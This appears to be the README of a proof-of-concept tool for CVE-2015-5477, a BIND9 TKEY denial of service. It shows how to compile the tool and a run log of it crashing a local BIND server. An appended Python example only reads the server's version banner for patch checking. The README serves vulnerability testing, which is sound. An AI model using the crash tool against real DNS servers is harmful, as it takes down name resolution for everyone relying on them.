robertdavidgraham/cve-2015-5477

PoC for BIND9 TKEY assert DoS (CVE-2015-5477)

This exploit tests whether a BIND9 server is vulnerable by sending the exploit packet and checking whether the server crashes.

It's C code that you compile the normal way on Unix/Windows, such as:

# gcc tkill.c -o tkill

It'll run over both IPv4 and IPv6.

This is what it looks like running against localhost. Since resolving the name returns two IP addresses, it'll try both of them. For each address it first queries the "version" string, then sends the exploit. When it probes the second address, the version query fails because the service has already crashed from the first attempt.

root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
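
The run above asks for the version before it sends anything that can crash the server. The version step alone, as an added example that is not code from this repository: it reads the banner and stops there, so a defender can inventory servers without taking them down. It assumes the banner is served as the `version.bind` TXT record in class CHAOS (BIND's convention); the function names and the sample reply are constructed for illustration.

```python
import secrets
import socket
import struct

QUESTION = b"\x07version\x04bind\x00" + struct.pack(">HH", 16, 3)  # version.bind, TXT, CHAOS
# Constructed sample reply (not captured traffic): question echoed, one TXT answer.
SAMPLE_REPLY = (struct.pack(">HHHHHH", 0x1234, 0x8400, 1, 1, 0, 0) + QUESTION + b"\xc0\x0c"
                + struct.pack(">HHIH", 16, 3, 0, 16) + b"\x0f9.11.0pre-alpha")

def build_version_query(qid):
    """Query for version.bind, type TXT, class CHAOS (flags 0, QDCOUNT 1)."""
    return struct.pack(">HHHHHH", qid, 0, 1, 0, 0, 0) + QUESTION

def _skip_name(msg, off):  # offset just past the name at off; IndexError if truncated
    while msg[off]:
        if msg[off] >= 0xC0:          # compression pointer: two bytes, ends the name
            return off + 2
        if msg[off] > 63:
            raise ValueError("reserved label type")
        off += 1 + msg[off]
    return off + 1

def parse_version_reply(msg, qid):
    """First TXT string of the first answer; None unless ID matches, QR set, RCODE 0."""
    try:
        rid, flags, qd, an = struct.unpack_from(">HHHH", msg)
        off = 12
        for _ in range(qd):                        # skip the question section
            off = _skip_name(msg, off) + 4
        off = _skip_name(msg, off)                 # owner name of the first answer
        rtype, _, _, rdlen = struct.unpack_from(">HHIH", msg, off)
        txt = msg[off + 11 : off + 11 + msg[off + 10]]
    except (IndexError, struct.error, ValueError):
        return None
    ok = (rid == qid and (flags & 0x800F) == 0x8000 and an and rtype == 16
          and len(txt) == msg[off + 10] < rdlen)
    return txt.decode("ascii", "replace") if ok else None

def query_version(host, port=53, timeout=5.0):
    """Ask host for its version string over UDP; None on timeout or unusable reply."""
    qid = secrets.randbelow(1 << 16)               # unpredictable ID, checked on receipt
    family, _, _, _, addr = socket.getaddrinfo(host, port, type=socket.SOCK_DGRAM)[0]
    with socket.socket(family, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        try:
            s.connect(addr)                        # only accept datagrams from this peer
            s.send(build_version_query(qid))
            return parse_version_reply(s.recv(4096), qid)
        except OSError:
            return None
```

Operators can override or hide this string with the `version` option in named.conf, so treat the result as a hint to compare against the vendor advisory, not as proof of patch level.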
